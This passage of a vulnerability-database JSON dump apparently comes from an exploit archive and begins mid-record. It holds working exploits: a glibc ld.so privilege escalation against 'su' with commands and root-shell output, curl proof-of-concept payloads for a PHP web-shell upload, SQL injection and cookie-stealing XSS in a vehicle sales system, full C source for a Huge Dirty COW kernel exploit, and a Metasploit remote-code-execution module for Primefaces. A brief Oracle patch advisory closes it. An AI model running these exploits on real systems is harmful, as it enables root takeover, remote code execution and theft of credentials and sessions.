LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK=\"$(((1<<17)-1))\" ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.\r\nSegmentation fault\r\n \r\nreal 0m1.443s\r\nuser 0m0.368s\r\nsys 0m1.072s\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK=\"$(((1<<18)-1))\" ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.\r\nSegmentation fault\r\n \r\nreal 0m2.840s\r\nuser 0m0.656s\r\nsys 0m2.172s\r\n \r\n...\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK=\"$(((1<<23)-1))\" ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.\r\nSegmentation fault\r\n \r\nreal 0m5.778s\r\nuser 0m1.200s\r\nsys 0m4.576s\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK=\"$(((1<<24)-1))\" ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.\r\nSegmentation fault\r\n \r\nreal 0m11.589s\r\nuser 0m2.520s\r\nsys 0m9.060s\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK=\"$(((1<<25)-1))\" ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.\r\n# id; exit\r\nuid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),1000(user)\r\n \r\nreal 0m28.050s\r\nuser 0m6.140s\r\nsys 0m21.892s\r\n \r\n6/ Improvements in the running time of this exploit are left as an\r\nexercise for the interested reader:\r\n \r\n$ env -i LD_LIBRARY_PATH=. LD_PRELOAD=nonexistent LD_HWCAP_MASK=\"$(((1<<25)-1))\" LD_DEBUG=libs env 2>&1 | head -c 1000\r\n 3084: find library=nonexistent [0]; searching\r\n 3084: search path=./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/de/vme/fpu:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/de/vme:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/de/fpu:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/de:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/vme/fpu:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/vme:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/fpu:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/de/vme/fpu:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mc\r\n \r\n$ mkdir -p './tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/de/vme/fpu'\r\n \r\n$ mv -- *.so* './tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/de/vme/fpu'\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK=\"$(((1<<25)-1))\" ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.\r\n# id; exit\r\nuid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),1000(user)\r\n \r\nreal 0m23.485s\r\nuser 0m5.244s\r\nsys 0m18.220s\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='os-release:rootshell.so' LD_HWCAP_MASK=\"$(((1<<25)-1))\" ./su\r\nERROR: ld.so: object 'os-release' from LD_PRELOAD cannot be preloaded (invalid ELF header): ignored.\r\n# id; exit\r\nuid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),1000(user)\r\n \r\nreal 0m11.352s\r\nuser 0m2.844s\r\nsys 0m8.388s\r\n \r\n------------------------------------------------------------------------\r\nCentOS 7 (i386)\r\n------------------------------------------------------------------------\r\n \r\nIn this example, we exploit \"su\" on a 32-bit CentOS 7.3.1611: we\r\ninstalled \"CentOS-7-i386-Minimal-1611.iso\" (the last release before\r\nCVE-2017-1000366 was patched), and manually disabled protected_hardlinks\r\n(\"echo 0 > /proc/sys/fs/protected_hardlinks\").\r\n \r\n$ env -i LD_PRELOAD=nonexistent LD_HWCAP_MASK=0 LD_DEBUG=libs env 2>&1 | head\r\n 17896: find library=nonexistent [0]; searching\r\n 17896: search cache=/etc/ld.so.cache\r\n 17896: search path=/lib/tls/i686:/lib/tls:/lib/i686:/lib:/usr/lib/tls/i686:/usr/lib/tls:/usr/lib/i686:/usr/lib (system search path)\r\n 17896: trying file=/lib/tls/i686/nonexistent\r\n 17896: trying file=/lib/tls/nonexistent\r\n 17896: trying file=/lib/i686/nonexistent\r\n 17896: trying file=/lib/nonexistent\r\n 17896: trying file=/usr/lib/tls/i686/nonexistent\r\n 17896: trying file=/usr/lib/tls/nonexistent\r\n 17896: trying file=/usr/lib/i686/nonexistent\r\n \r\n$ mkdir -p '/var/tmp/:/lib:/usr/lib:'\r\n \r\n$ cd '/var/tmp/:/lib:/usr/lib:'\r\n \r\n$ ln `which su` .\r\n \r\n$ env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded: ignored.\r\nSegmentation fault\r\n \r\n$ dmesg | tail -n 1\r\n[ 8414.911000] su[18088]: segfault at 6e6e6173 ip b77645e2 sp bfe0cb40 error 4 in ld-2.17.so[b775f000+1f000]\r\n \r\n$ cp -- `ldd ./su | grep ' => /' | awk '{print $3}'` .\r\n \r\n$ cat > la.c << \"EOF\"\r\n> static void __attribute__ ((constructor)) _init (void) {\r\n> ...\r\n> // setuid(0);\r\n> ...\r\n> // execve(\"/bin/sh\");\r\n> ...\r\n> }\r\n> EOF\r\n$ gcc -fpic -shared -nostdlib -Os -s -o rootshell.so la.c\r\n \r\n$ chmod u+s rootshell.so\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK=\"$(((1<<16)-1))\" ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded: ignored.\r\nSegmentation fault\r\n \r\nreal 0m0.527s\r\nuser 0m0.085s\r\nsys 0m0.441s\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK=\"$(((1<<17)-1))\" ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded: ignored.\r\nSegmentation fault\r\n \r\nreal 0m1.060s\r\nuser 0m0.182s\r\nsys 0m0.877s\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK=\"$(((1<<18)-1))\" ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded: ignored.\r\nSegmentation fault\r\n \r\nreal 0m2.093s\r\nuser 0m0.384s\r\nsys 0m1.702s\r\n \r\n...\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK=\"$(((1<<25)-1))\" ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded: ignored.\r\nSegmentation fault\r\n \r\nreal 0m17.071s\r\nuser 0m2.525s\r\nsys 0m14.537s\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK=\"$(((1<<26)-1))\" ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded: ignored.\r\nSegmentation fault\r\n \r\nreal 0m33.926s\r\nuser 0m5.464s\r\nsys 0m28.429s\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK=\"$(((1<<27)-1))\" ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded: ignored.\r\nsh-4.2# id; exit\r\nuid=0(root) gid=0(root) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023\r\n \r\nreal 1m30.604s\r\nuser 0m16.169s\r\nsys 1m14.395s\r\n \r\n \r\n========================================================================\r\nAcknowledgments\r\n========================================================================\r\n \r\nWe thank the members of the [email\u00a0protected] list.\n\n# 0day.today [2018-04-02] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/29207"}, {"lastseen": "2018-04-10T09:44:42", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2018-03-20T00:00:00", "published": "2018-03-20T00:00:00", "href": "https://0day.today/exploit/description/30020", "id": "1337DAY-ID-30020", "type": "zdt", "title": "Vehicle Sales Management System - Multiple Vulnerabilities", "sourceData": "# Exploit Title: VSMS Multiple Vulnerabilities\r\n# Google Dork: N/A\r\n# Date: 16-3-2018\r\n# Exploit Author: Sing\r\n# Vendor Homepage: https://sourceforge.net/projects/vsms-php/?source=typ_redirect\r\n# Software Link: https://sourceforge.net/projects/vsms-php/?source=typ_redirect\r\n# Version: 07/2017 (possible v1.2)\r\n# Tested on: CentOS 6.9\r\n# CVE : CVE-2017-1000474\r\n \r\n \r\n \r\n1 login/vehicles.php: Lack of file type filter enabling attacker to upload PHP scripts that can later be executed\r\n \r\n \r\nPOC\r\n \r\ncurl -i -b 'PHPSESSID=58csdp0as3lvqapqjesp67tr05' -F 'submit=submit' -F support_images[][email\u00a0protected]/getShell.php http://10.0.0.14/soyket-vsms-php-63b563b/login/vehicles.php\r\n \r\nThe malicious PHP file has been uploaded to /var/www/html/soyket-vsms-php-63b563b/login/uploads. Now, browse to the location and note the file name. In my vase it's 1510529218getShell.php. To execute it do\r\n \r\ncurl http://10.0.0.14/soyket-vsms-php-63b563b/login/uploads/1510529218getShell.php?cmd=id\r\n \r\n \r\n \r\n2 login/profile.php: Found SQLI in the Date of Birth text box.\r\n \r\n \r\nPOC\r\n \r\nPaste the below POC into the birth date text box and update. A mysql version will appear in the Position box\r\n \r\n2015-11-30',[email\u00a0protected]@version,u_type='Employee' WHERE u_email='[email\u00a0protected]';-- -\r\n \r\n \r\n \r\n3 login/Actions.php: Found Stored XSS in manufacturer_name\r\n \r\n \r\nPOC\r\n \r\ncurl http://10.0.0.14/soyket-vsms-php-63b563b/login/Actions.php?action=create -d 'manufacturer_name=<script>alert(document.cookie)</script>'\r\n \r\nNow when user's browse to login/model.php page, he/she will see an alert with the session cookie\r\n \r\nhttp://10.0.0.14/soyket-vsms-php-63b563b/login/model.php\r\n \r\n \r\n \r\n4 login/Actions.php (Multiple vulnerabilities)\r\n \r\n \r\nPOC (SQLI)\r\n \r\ncurl http://10.0.0.14/soyket-vsms-php-63b563b/login/Actions.php?action=checkuser -d \"[email\u00a0protected]' union select 'SQLIIII' into outfile'/tmp/stuff.txt\"\r\n \r\nThis SQLI will write SQLIIII to /tmp/stuff.txt.\r\n \r\n \r\n \r\n \r\nPOC (Information Leak\r\n \r\ncurl http://10.0.0.14/soyket-vsms-php-63b563b/login/Actions.php?action=listu\r\n \r\nThis gives anonymous user full list of the users table with unsalted MD5 hash passwords.\r\n \r\n \r\n \r\n5. Solution:\r\n \r\n \r\n \r\nThe author notified of a new version with fixes (possibly v1.3). It can be found at vendor\u2019s home page\r\n \r\nhttps://sourceforge.net/projects/vsms-php/?source=typ_redirect\n\n# 0day.today [2018-04-10] #", "sourceHref": "https://0day.today/exploit/30020", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-02T21:36:14", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category dos / poc", "modified": "2018-03-20T00:00:00", "published": "2018-03-20T00:00:00", "href": "https://0day.today/exploit/description/30017", "id": "1337DAY-ID-30017", "type": "zdt", "title": "Linux Kernel - The Huge Dirty Cow Overwriting The Huge Zero Page (2) Exploit", "sourceData": "/*\r\n * The code is modified from https://www.exploit-db.com/exploits/43199/\r\n */\r\n#define _GNU_SOURCE\r\n#include <unistd.h>\r\n#include <sys/mman.h>\r\n#include <err.h>\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <fcntl.h>\r\n#include <sys/stat.h>\r\n#include <sched.h>\r\n#include <pthread.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n \r\n#define TRIES_PER_PAGE (20000000)\r\n#define PAGE_SIZE (0x1000)\r\n#define MEMESET_VAL (0x41)\r\n#define MAP_SIZE (0x200000)\r\n#define STRING \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\r\n#define OFFSIZE ((sizeof(STRING)-1)/sizeof(char))\r\n \r\nstruct args{\r\n int fd;\r\n void *p;\r\n int stop;\r\n off_t off;\r\n char *chp;\r\n};\r\n \r\nvoid *write_thread(struct args *arg) {\r\n for (int i = 0; i < TRIES_PER_PAGE && !arg->stop; i++) {\r\n lseek(arg->fd, (off_t)(arg->chp + arg->off*OFFSIZE), SEEK_SET);\r\n write(arg->fd, STRING, sizeof(STRING));\r\n lseek(arg->fd, (off_t)(arg->chp + arg->off*OFFSIZE), SEEK_SET);\r\n }\r\n return NULL;\r\n}\r\n \r\nvoid *wait_for_success(struct args *arg) {\r\n while(*(arg->chp+arg->off*OFFSIZE) != 'A') {\r\n int i = madvise(arg->p, MAP_SIZE, MADV_DONTNEED);\r\n sched_yield();\r\n }\r\n arg->stop = 1;\r\n return NULL;\r\n}\r\n \r\nint main(void) {\r\n struct args arg;\r\n \r\n arg.off = 0;\r\n \r\n arg.p = mmap((void*)0x40000000, MAP_SIZE, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);\r\n \r\n if(arg.p == MAP_FAILED)\r\n perror(\"[!] mmap()\");\r\n arg.chp = arg.p;\r\n printf(\"mmap address is %p\\n\", arg.p);\r\n madvise(arg.p, MAP_SIZE, MADV_HUGEPAGE);\r\n \r\n arg.fd = open(\"/proc/self/mem\", O_RDWR);\r\n if (arg.fd < 0) {\r\n perror(\"[!] open()\");\r\n return 1;\r\n }\r\n \r\n \r\n while(arg.off < PAGE_SIZE/sizeof(STRING)) {\r\n arg.stop = 0;\r\n pthread_t thread0, thread1;\r\n int ret = pthread_create(&thread0, NULL, (void *)wait_for_success, &arg);\r\n ret |= pthread_create(&thread1, NULL, (void *)write_thread, &arg);\r\n \r\n if (ret) {\r\n perror(\"[!] pthread_create()\");\r\n return 1;\r\n }\r\n \r\n pthread_join(thread0, NULL);\r\n pthread_join(thread1, NULL); \r\n \r\n printf(\"[*] Done 0x%x String\\n\", arg.off);\r\n arg.off++;\r\n }\r\n printf(\"[*] Overwrite a page\\n\");\r\n printf(\"%s\\n\", arg.p);\r\n return 0;\r\n}\n\n# 0day.today [2018-04-02] #", "sourceHref": "https://0day.today/exploit/30017", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-01T19:35:55", "bulletinFamily": "exploit", "description": "Exploit for java platform in category web applications", "modified": "2018-01-18T00:00:00", "published": "2018-01-18T00:00:00", "href": "https://0day.today/exploit/description/29575", "id": "1337DAY-ID-29575", "title": "Primefaces 5.x - Remote Code Execution Exploit", "type": "zdt", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::Tcp\r\n include Msf::Exploit::Remote::HttpClient\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'CVE-2017-1000486 Primefaces Remote Code Execution Exploit',\r\n 'Description' => %q{\r\n This module exploits an expression language remote code execution flaw in the Primefaces JSF framework.\r\n Primefaces versions prior to 5.2.21, 5.3.8 or 6.0 are vulnerable to a padding oracle attack, due to the use of weak crypto and default encryption password and salt.\r\n },\r\n 'Author' => [ 'Bjoern Schuette' ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', 'CVE-2017-1000486'],\r\n ['URL', 'http://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html'],\r\n ['URL', 'https://cryptosense.com/weak-encryption-flaw-in-primefaces/'],\r\n ['URL', 'http://schuette.se/2018/01/16/in-your-primeface/']\r\n ],\r\n 'Privileged' => true,\r\n 'Payload' =>\r\n {\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd'\r\n }\r\n \r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'WfsDelay' => 30\r\n },\r\n 'DisclosureDate' => 'Feb 15 2016',\r\n 'Platform' => ['unix', 'bsd', 'linux', 'osx', 'win'],\r\n 'Arch' => ARCH_CMD,\r\n 'Targets' => [\r\n [\r\n 'Universal', {\r\n 'Platform' => ['unix', 'bsd', 'linux', 'osx', 'win'],\r\n 'Arch' => [ ARCH_CMD ],\r\n },\r\n ],\r\n ],\r\n 'DefaultTarget' => 0))\r\n \r\n register_options([\r\n Opt::RPORT(80),\r\n OptString.new('PASSWORD', [ true , \"The password to login\", 'primefaces']),\r\n OptString.new('TARGETURI', [true, 'The base path to primefaces', '/javax.faces.resource/dynamiccontent.properties.xhtml']) ,\r\n OptString.new('CMD', [ false , \"Command to execute\", '']),\r\n ])\r\n end\r\n \r\n def encrypt_el(password, payload)\r\n \r\n salt = [0xa9, 0x9b, 0xc8, 0x32, 0x56, 0x34, 0xe3, 0x03].pack('c*')\r\n iterationCount = 19\r\n \r\n cipher = OpenSSL::Cipher.new(\"DES\")\r\n cipher.encrypt\r\n cipher.pkcs5_keyivgen password, salt, iterationCount\r\n \r\n ciphertext = cipher.update payload\r\n ciphertext << cipher.final\r\n return ciphertext\r\n \r\n end\r\n \r\n def http_send_command(cmd, payloadEL)\r\n uri = normalize_uri(target_uri.path)\r\n encrypted_payload = encrypt_el(datastore['PASSWORD'], payloadEL)\r\n encrypted_payload_base64 = Rex::Text.encode_base64(encrypted_payload)\r\n encrypted_payload_base64_url_encoded = Rex::Text.uri_encode(encrypted_payload_base64)\r\n \r\n # send the payload and execute command\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => uri,\r\n 'vars_post' => {\r\n 'pfdrt' => 'sc',\r\n 'ln' => 'primefaces',\r\n 'pfdrid' => encrypted_payload_base64_url_encoded\r\n }\r\n })\r\n \r\n if res.nil?\r\n vprint_error(\"Connection timed out\")\r\n fail_with(Failure::Unknown, \"Failed to trigger the Enter button\")\r\n end\r\n \r\n if res && res.headers && (res.code == 302 || res.code == 200)\r\n print_good(\"HTTP return code #{res.code}\")\r\n else\r\n vprint_error(res.body)\r\n fail_with(Failure::Unknown, \"#{peer} - Unknown error during execution\")\r\n end\r\n return res\r\n end\r\n \r\n def exploit\r\n cmd=\"\"\r\n if not datastore['CMD'].empty?\r\n cmd = datastore['CMD']\r\n else\r\n cmd = payload.encoded\r\n end\r\n payloadEL = '${facesContext.getExternalContext().getResponse().setContentType(\"text/plain;charset=\\\"UTF-8\\\"\")}'\r\n payloadEL << '${session.setAttribute(\"scriptfactory\",\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance())}'\r\n payloadEL << '${session.setAttribute(\"scriptengine\",session.getAttribute(\"scriptfactory\").getEngineByName(\"JavaScript\"))}'\r\n payloadEL << '${session.getAttribute(\"scriptengine\").getContext().setWriter(facesContext.getExternalContext().getResponse().getWriter())}'\r\n payloadEL << '${session.getAttribute(\"scriptengine\").eval('\r\n payloadEL << '\"var os = java.lang.System.getProperty(\\\"os.name\\\");'\r\n payloadEL << 'var proc = null;'\r\n payloadEL << 'os.toLowerCase().contains(\\\"win\\\")? '\r\n payloadEL << 'proc = new java.lang.ProcessBuilder[\\\"(java.lang.String[])\\\"]([\\\"cmd.exe\\\",\\\"/C\\\",\\\"%s\\\"]).start()' % cmd\r\n payloadEL << ' : proc = new java.lang.ProcessBuilder[\\\"(java.lang.String[])\\\"]([\\\"/bin/sh\\\",\\\"-c\\\",\\\"%s\\\"]).start();' % cmd\r\n payloadEL << 'var is = proc.getInputStream();'\r\n payloadEL << 'var sc = new java.util.Scanner(is,\\\"UTF-8\\\"); var out = \\\"\\\";'\r\n payloadEL << 'while(sc.hasNext()) {out += sc.nextLine()+String.fromCharCode(10);}print(out);\")}'\r\n payloadEL << '${facesContext.getExternalContext().getResponse().getWriter().flush()}'\r\n payloadEL << '${facesContext.getExternalContext().getResponse().getWriter().close()}';\r\n \r\n vprint_status(\"Attempting to execute: #{cmd}\")\r\n resp = http_send_command(cmd, payloadEL)\r\n print_line(resp.body.to_s)\r\n m = resp.body.to_s \r\n if m.empty?\r\n print_error(\"This server may not be vulnerable\")\r\n end\r\n return\r\n end\r\n \r\n def check\r\n var_a = rand_text_alpha_lower(4)\r\n payloadEL = \"${facesContext.getExternalContext().setResponseHeader(\\\"primesecretchk\\\", %s\" % var_a\r\n res = http_send_command(var_a, payloadEL)\r\n if res.headers\r\n if res.headers[\"primesecretchk\"] == #{var_a}\r\n vprint_good(\"Victim evaluates EL expressions\")\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n else\r\n vprint_error(\"Unable to determine due to a HTTP connection timeout\")\r\n return Exploit::CheckCode::Unknown\r\n end\r\n return Exploit::CheckCode::Safe\r\n end\r\n \r\nend\n\n# 0day.today [2018-03-01] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/29575"}], "oracle": [{"lastseen": "2019-05-29T18:20:53", "bulletinFamily": "software", "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n[Critical Patch Updates and Security Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore _strongly_ recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes _without_ delay.**\n\nThis Critical Patch Update contains 310 new security fixes across the product families listed below. Please note that a MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ July 2017 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2282980.1>).\n\nPlease note that the vulnerabilities in this Critical Patch Update are scored using version 3.0 of Common Vulnerability Scoring Standard (CVSS).\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available [here](<http://www.oracle.com/technetwork/topics/security/cpufaq-098434.html#CVRF>).\n", "modified": "2017-07-18T00:00:00", "published": "2018-03-20T00:00:00", "id": "ORACLE:CPUJUL2017-3236622", "href": "", "title": "Oracle Critical Patch Update - July 2017", "type": "oracle", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}